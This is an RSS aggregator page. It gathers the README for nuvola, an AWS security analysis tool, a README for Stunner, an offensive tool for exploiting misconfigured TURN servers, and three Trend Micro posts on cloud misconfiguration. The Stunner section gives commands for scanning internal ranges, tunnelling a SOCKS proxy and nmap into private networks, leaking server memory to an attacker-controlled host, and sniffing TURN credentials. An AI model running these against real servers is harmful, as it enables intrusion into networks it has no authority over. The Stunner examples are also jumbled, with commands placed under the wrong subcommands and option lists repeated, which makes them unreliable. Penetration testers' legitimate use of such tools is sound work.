FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On Aws Environments Configurations And Services

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using a simple Yaml syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments (at the moment only AWS).

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralised and lightweight digital twin.


Quick Start

Requirements

  • docker-compose installed
  • an AWS account configured to be used with awscli with full access to the cloud resources, better if in ReadOnly mode (the policy arn:aws:iam::aws:policy/ReadOnlyAccess is fine)

Setup

  1. Clone the repository
git clone --depth=1 https://github.com/primait/nuvola.git; cd nuvola
  1. Create and edit, if required, the .env file to set your DB username/password/URL
cp .env_example .env;
  1. Start the Neo4j docker instance
make start
  1. Build the tool
make build

Usage

  1. Firstly you need to dump all the supported AWS services configurations and load the data into the Neo4j database:
./nuvola dump -profile default_RO -outputdir ~/DumpDumpFolder -format zip
  1. To import a previously executed dump operation into the Neo4j database:
./nuvola assess -import ~/DumpDumpFolder/nuvola-default_RO_20220901.zip
  1. To only perform static assessments on the data loaded into the Neo4j database using the predefined ruleset:
./nuvola assess
  1. Or use Neo4j Browser to manually explore the digital twin.

About nuvola

To get started with nuvola and its database schema, check out the nuvola Wiki.

No data is sent or shared with Prima Assicurazioni.

How to contribute

  • reporting bugs and issues
  • reporting new improvements
  • reviewing issues and pull requests
  • fixing bugs and issues
  • creating new rules
  • improving the overall quality

Presentations

License

nuvola uses graph theory to reveal possible attack paths and security misconfigurations on cloud environments.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this repository and program. If not, see http://www.gnu.org/licenses/.



Stunner - Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers


Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.


LICENSE

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

implemented RFCs

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

Available Commands

info

This command will print some info about the stun or turn server like supported protocols and attributes like the used software.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --timeout value               connect timeout to turn server (default: 1s)  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--timeout value connect timeout to turn server (default: 1s)
--help, -h show help (default: false)

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to the specified IP addresses. If a specific range is not prohibited you can enumerate this range further with the other provided commands. If an ip is reachable it means the TURN server will forward traffic to this IP.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --help, -h                    show help (default: false)  

Example

TCP based TURN connection (connection from you the TURN server):

./stunner info -s x.x.x.x:443

UDP based TURN connection (connection from you the TURN server):

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--help, -h show help (default: false)

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It will launch a local socks5 server with no authentication and will relay all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfuigured it will forward the traffic to internal adresses so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over socks, it will be resolved using your local nameserver so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

certificates via the connection. (default: true) --help, -h show help (default: false)">
--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")  --drop-public, -x             Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)  --help, -h                    show help (default: false)  

Example

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

After starting the proxy open your browser, point the proxy in your settings to socks5 with an ip of 127.0.0.1:1080 (be sure to not set the bypass local address option as we want to reach the remote local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (those will call the ports on the tested TURN server from the local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this socks5 proxy with a correct configured proxychains (note it's -sT to do TCP syns otherwise it will not use the socks5 proxy)

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

brute-transports

This will most likely yield no useable information but can be useful to enumerate all available transports (=protocols to internal systems) supported by the server. This might show some custom protocol implementations but mostly will only return the defaults.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--listen value, -l value Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)
--help, -h show help (default: false)

memoryleak

This attack works the following way: The server takes the data to send to target (must be a high port > 1024 in most cases) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it might send you some memory up the length to the target. Cisco Expressway was confirmed vulnerable to this but according to cisco it only leaked memory of the current session.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control  --size value                  Size of the buffer to leak (default: 35510)  --help, -h                    show help (default: false)  

Example

To receive the data we need to set up a receiver on a server with a public ip. Normally firewalls are configured to only allow highports (>1024) from TURN servers so be sure to use a high port like 8080 in this example when connecting out to the internet.

./stunner socks -s x.x.x.x:3478 -u username -p password -x

then execute the following statement on your machine adding the public ip to the t parameter

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

If it works you should see big loads of memory coming in, otherwise you will only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets this scanner can be used to scan all private ip ranges and send them SNMP and DNS requests. As this checks a lot of IPs this can take multiple days to complete so use with caution or specify smaller targets via the parameters. You need to supply a SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can for example use burp collaborator.

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --community-string value      SNMP community string to use for scanning (default: "public")  --domain value                domain name to resolve on internal DNS servers during scanning  --ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)  --help, -h                    show help (default: false)  

Example

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value turn server to connect to in the format host:port
--tls Use TLS for connecting (false in most tests) (default: false)
--protocol value protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value connect timeout to turn server (default: 1s)
--username value, -u value username for the turn server
--password value, -p value password for the turn server
--help, -h show help (default: false)

tcp-scanner

Same as udp-scanner but sends out HTTP requests to the specified ports (HTTPS is not supported)

Options

--debug, -d                   enable debug output (default: false)  --turnserver value, -s value  turn server to connect to in the format host:port  --tls                         Use TLS for connecting (false in most tests) (default: false)  --protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout value               connect timeout to turn server (default: 1s)  --username value, -u value    username for the turn server  --password value, -p value    password for the turn server  --ports value                 Ports to check (default: "80,443,8080,8081")  --ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)  --help, -h                    show help (default: false)  

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

Example workflow

Let's say you find a service using WebRTC and want to test it.

First step is to get the required data. I suggest to launch Wireshark in the background and just join a meeting via Burp to collect all HTTP and Websocket traffic. Next search your burp history for some keywords related to TURN like 3478, password, credential and username (be sure to also check the websocket tab for these keywords). This might reveal the turn server and the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in burp start looking at wireshark to identify the traffic. If it's on a non standard port (anything else then 3478) decode the protocol in Wireshark via a right click as STUN. This should show you the username used to connect and you can use this information to search burps history even further for the required data . Please note that Wireshark can't show you the password as the password is used to hash some package contents so it can not be reversed.

Next step would be to issue the info command to the turn server using the correct port and protocol obtained from burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems you can exploit this further but be aware that UDP has only limited use cases.

If TCP connections to internal systems are allowed simply launch the socks command and access the allowed IPs via a browser and set the socks proxy to 127.0.0.1:1080. You can try out 127.0.0.1:443 and other ips to find management interfaces.



Are You Promoting Security Fluency in your Organization?

 

Migrating to the cloud is hard. The PowerPoint deck and pretty architectures are drawn up quickly but the work required to make the move will take months and possibly years.

 

The early stages require significant effort by teams to learn new technologies (the cloud services themselves) and new ways of the working (the shared responsibility model).

 

In the early days of your cloud efforts, the cloud center of expertise is a logical model to follow.

 

Center of Excellence

 

A cloud center of excellence is exactly what it sounds like. Your organization forms a new team—or an existing team grows into the role—that focuses on setting cloud standards and architectures.

 

They are often the “go-to” team for any cloud questions. From the simple (“What’s an Amazon S3 bucket?”), to the nuanced (“What are the advantages of Amazon Aurora over RDS?”), to the complex (“What’s the optimum index/sort keying for this DynamoDB table?”).

 

The cloud center of excellence is the one-stop shop for cloud in your organization. At the beginning, this organizational design choice can greatly accelerate the adoption of cloud technologies.

 

Too Central

 

The problem is that accelerated adoption doesn’t necessarily correlate with accelerated understanding and learning.

 

In fact, as the center of excellent continues to grow its success, there is an inverse failure in organizational learning which create a general lack of cloud fluency.

 

Cloud fluency is an idea introduced by Forrest Brazeal at A Cloud Guru that describes the general ability of all teams within the organization to discuss cloud technologies and solutions. Forrest’s blog post shines a light on this situation and is summed up nicely in this cartoon;

 

Our own Mark Nunnikhoven also spoke to Forrest on episode 2 of season 2 for #LetsTalkCloud.

 

Even though the cloud center of excellence team sets out to teach everyone and raise the bar, the work soon piles up and the team quickly shifts away from an educational mandate to a “fix everything” one.

 

What was once a cloud accelerator is now a place of burnout for your top, hard-to-replace cloud talent.

 

Security’s Past

 

If you’ve paid attention to how cybersecurity teams operate within organizations, you have probably spotted a number of very concerning similarities.

 

Cybersecurity teams are also considered a center of excellence and the central team within the organization for security knowledge.

 

Most requests for security architecture, advice, operations, and generally anything that includes the prefix “cyber”, word “risk”, or hints of “hacking” get routed to this team.

 

This isn’t the security team’s fault. Over the years, systems have increased in complexity, more and more incidents occur, and security teams rarely get the opportunity to look ahead. They are too busy stuck in “firefighting mode” to take as step back and re-evaluate the organizational design structure they work within.

 

According to Gartner, for every 750 employees in an organization, one of those is dedicated to cybersecurity. Those are impossible odds that have lead to the massive security skills gap.

 

Fluency Is The Way Forward

 

Security needs to follow the example of cloud fluency. We need “security fluency” in order to import the security posture of the systems we built and to reduce the risk our organizations face.

 

This is the reason that security teams need to turn their efforts to educating development teams. DevSecOps is a term chock full of misconceptions and it lacks context to drive the needed changes but it is handy for raising awareness of the lack of security fluency.

 

Successful adoption of a DevOps philosophy is all about removing barriers to customer success. Providing teams with the tools and autonomy they require is a critical factor in their success.

 

Security is just one aspect of the development team’s toolkit. It’s up to the current security team to help educate them on the principles driving modern cybersecurity and how to ensure that the systems they build work as intended…and only as intended.

The post Are You Promoting Security Fluency in your Organization? appeared first on .

Knowing your shared security responsibility in Microsoft Azure and avoiding misconfigurations

 

Trend Micro is excited to launch new Trend Micro Cloud One™ – Conformity capabilities that will strengthen protection for Azure resources.

 

As with any launch, there is a lot of new information, so we decided to sit down with one of the founders of Conformity, Mike Rahmati. Mike is a technologist at heart, with a proven track record of success in the development of software systems that are resilient to failure and grow and scale dynamically through cloud, open-source, agile, and lean disciplines. In the interview, we picked Mike’s brain on how these new capabilities can help customers prevent or easily remediate misconfigurations on Azure. Let’s dive in.

 

What are the common business problems that customers encounter when building on or moving their applications to Azure or Amazon Web Services (AWS)?

The common problem is there are a lot of tools and cloud services out there. Organizations are looking for tool consolidation and visibility into their cloud environment. Shadow IT and business units spinning up their own cloud accounts is a real challenge for IT organizations to keep on top of. Compliance, security, and governance controls are not necessarily top of mind for business units that are innovating at incredible speeds. That is why it is so powerful to have a tool that can provide visibility into your cloud environment and show where you are potentially vulnerable from a security and compliance perspective.

 

Common misconfigurations on AWS are an open Amazon Elastic Compute Cloud (EC2) or a misconfigured IAM policy. What is the equivalent for Microsoft?

The common misconfigurations are actually quite similar to what we’ve seen with AWS. During the product preview phase, we’ve seen customers with many of the same kinds of misconfiguration issues as we’ve seen with AWS. For example, Microsoft Azure Blobs Storage is the equivalent to Amazon S3 – that is a common source of misconfigurations. We have observed misconfiguration in two main areas: Firewall and Web Application Firewall (WAF),which is equivalent to AWS WAF. The Firewall is similar to networking configuration in AWS, which provides inbound protection for non-HTTP protocols and network related protection for all ports and protocols. It is important to note that this is based on the 100 best practices and 15 services we currently support for Azure and growing, whereas, for AWS, we have over 600 best practices in total, with over 70 controls with auto-remediation.

 

Can you tell me about the CIS Microsoft Azure Foundation Security Benchmark?

We are thrilled to support the CIS Microsoft Azure Foundation Security Benchmark. The CIS Microsoft Azure Foundations Benchmark includes automated checks and remediation recommendations for the following: Identity and Access Management, Security Center, Storage Accounts, Database Services, Logging and Monitoring, Networking, Virtual Machines, and App Service. There are over 100 best practices in this framework and we have rules built to check for all of those best practices to ensure cloud builders are avoiding risk in their Azure environments.

Can you tell me a little bit about the Microsoft Shared Responsibility Model?

In terms of shared responsibility model, it’s is very similar to AWS. The security OF the cloud is a Microsoft responsibility, but the security IN the cloud is the customers responsibility. Microsoft’s ecosystem is growing rapidly, and there are a lot of services that you need to know in order to configure them properly. With Conformity, customers only need to know how to properly configure the core services, according to best practices, and then we can help you take it to the next level.

Can you give an example of how the shared responsibility model is used?

Yes. Imagine you have a Microsoft Azure Blob Storage that includes sensitive data. Then, by accident, someone makes it public. The customer might not be able to afford an hour, two hours, or even days to close that security gap.

In just a few minutes, Conformity will alert you to your risk status, provide remediation recommendations, and for our AWS checks give you the ability to set up auto-remediation. Auto-remediation can be very helpful, as it can close the gap in near-real time for customers.

What are next steps for our readers?

I’d say that whether your cloud exploration is just taking shape, you’re midway through a migration, or you’re already running complex workloads in the cloud, we can help. You can gain full visibility of your infrastructure with continuous cloud security and compliance posture management. We can do the heavy lifting so you can focus on innovating and growing. Also, you can ask anyone from our team to set you up with a complimentary cloud health check. Our cloud engineers are happy to provide an AWS and/or Azure assessment to see if you are building a secure, compliant, and reliable cloud infrastructure. You can find out your risk level in just 10-minutes.

 

Get started today with a 60-day free trial >

Check out our knowledge base of Azure best practice rules>

Learn more >

 

Do you see value in building a security culture that is shifted left?

Yes, we have done this for our customers using AWS and it has been very successful. The more we talk about shifting security left the better, and I think that’s where we help customers build a security culture. Every cloud customer is struggling with implementing earlier on in the development cycle and they need tools. Conformity is a tool for customers which is DevOps or DevSecOps friendly and helps them build a security culture that is shifted left.

We help customers shift security left by integrating the Conformity API into their CI/CD pipeline. The product also has preventative controls, which our API and template scanners provide. The idea is we help customers shift security left to identify those misconfigurations early on, even before they’re actually deployed into their environments.

We also help them scan their infrastructure-as-code templates before being deployed into the cloud. Customers need a tool to bake into their CI/CD pipeline. Shifting left doesn’t simply mean having a reporting tool, but rather a tool that allows them to shift security left. That’s where our product, Conformity, can help.

 

The post Knowing your shared security responsibility in Microsoft Azure and avoiding misconfigurations appeared first on .

Cloud Transformation Is The Biggest Opportunity To Fix Security

This overview builds on the recent report from Trend Micro Research on cloud-specific security gaps, which can be found here.

Don’t be cloud-weary. Hear us out.

Recently, a major tipping point was reached in the IT world when more than half of new IT spending was on cloud over non- cloud. So rather than being the exception, cloud-based operations have become the rule.

However, too many security solutions and vendors still treat the cloud like an exception – or at least not as a primary use case. The approach remains “and cloud” rather than “cloud and.”

Attackers have made this transition. Criminals know that business security is generally behind the curve with its approach to the cloud and take advantage of the lack of security experience surrounding new cloud environments. This leads to ransomware, cryptocurrency mining and data exfiltration attacks targeting cloud environments, to name a few.

Why Cloud?

There are many reasons why companies transition to the cloud. Lower costs, improved efficiencies and faster time to market are some of the primary benefits touted by cloud providers.

These benefits come with common misconceptions. While efficiency and time to market can be greatly improved by transitioning to the cloud, this is not done overnight. It can take years to move complete data centers and operational applications to the cloud. The benefits won’t be fully realized till the majority of functional data has been transitioned.

Misconfiguration at the User Level is the Biggest Security Risk in the Cloud

Cloud providers have built in security measures that leave many system administrators, IT directors and CTOs feeling content with the security of their data. We’ve heard it many times – “My cloud provider takes care of security, why would I need to do anything additional?”

This way of thinking ignores the shared responsibility model for security in the cloud. While cloud providers secure the platform as a whole, companies are responsible for the security of their data hosted in those platforms.

Misunderstanding the shared responsibility model leads to the No. 1 security risk associated with the cloud: Misconfiguration.

You may be thinking, “But what about ransomware and cryptomining and exploits?” Other attack types are primarily possible when one of the 3 misconfigurations below are present.

You can forget about all the worst-case, overly complex attacks: Misconfigurations are the greatest risk and should be the No. 1 concern. These misconfigurations are in 3 categories:

  1. Misconfiguration of the native cloud environment
  2. Not securing equally across multi-cloud environments (i.e. different brands of cloud service providers)
  3. Not securing equally to your on-premises (non-cloud) data centers

How Big is The Misconfiguration Problem?

Trend Micro Cloud One™ – Conformity identifies an average of 230 million misconfigurations per day.

To further understand the state of cloud misconfigurations, Trend Micro Research recently investigated cloud-specific cyber attacks. The report found a large number of websites partially hosted in world-writable cloud-based storage systems. Despite these environments being secure by default, settings can be manually changed to allow more access than actually needed.

These misconfigurations are typically put in place without knowing the potential consequences. But once in place, it is simple to scan the internet to find this type of misconfiguration, and criminals are exploiting them for profit.

Why Do Misconfigurations Happen?

The risk of misconfigurations may seem obvious in theory, but in practice, overloaded IT teams are often simply trying to streamline workflows to make internal processes easier. So, settings are changed to give read and/or write access to anyone in the organization with the necessary credentials. What is not realized is that this level of exposure can be found and exploited by criminals.

We expect this trend will increase in 2020, as more cloud-based services and applications gain popularity with companies using a DevOps workflow. Teams are likely to misconfigure more cloud-based applications, unintentionally exposing corporate data to the internet – and to criminals.

Our prediction is that through 2025, more than 75% of successful attacks on cloud environments will be caused by missing or misconfigured security by cloud customers rather than cloud providers.

How to Protect Against Misconfiguration

Nearly all data breaches involving cloud services have been caused by misconfigurations. This is easily preventable with some basic cyber hygiene and regular monitoring of your configurations.

Your data and applications in the cloud are only as secure as you make them. There are enough tools available today to make your cloud environment – and the majority of your IT spend – at least as secure as your non-cloud legacy systems.

You can secure your cloud data and applications today, especially knowing that attackers are already cloud-aware and delivering vulnerabilities as a service. Here are a few best practices for securing your cloud environment:

  • Employ the principle of least privilege: Access is only given to users who need it, rather than leaving permissions open to anyone.
  • Understand your part of the Shared Responsibility Model: While cloud service providers have built in security, the companies using their services are responsible for securing their data.
  • Monitor your cloud infrastructure for misconfigured and exposed systems: Tools are available to identify misconfigurations and exposures in your cloud environments.
  • Educate your DevOps teams about security: Security should be built in to the DevOps process.

To read the complete Trend Micro Research report, please visit: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security.

For additional information on Trend Micro’s approach to cloud security, click here: https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html.

The post Cloud Transformation Is The Biggest Opportunity To Fix Security appeared first on .

❌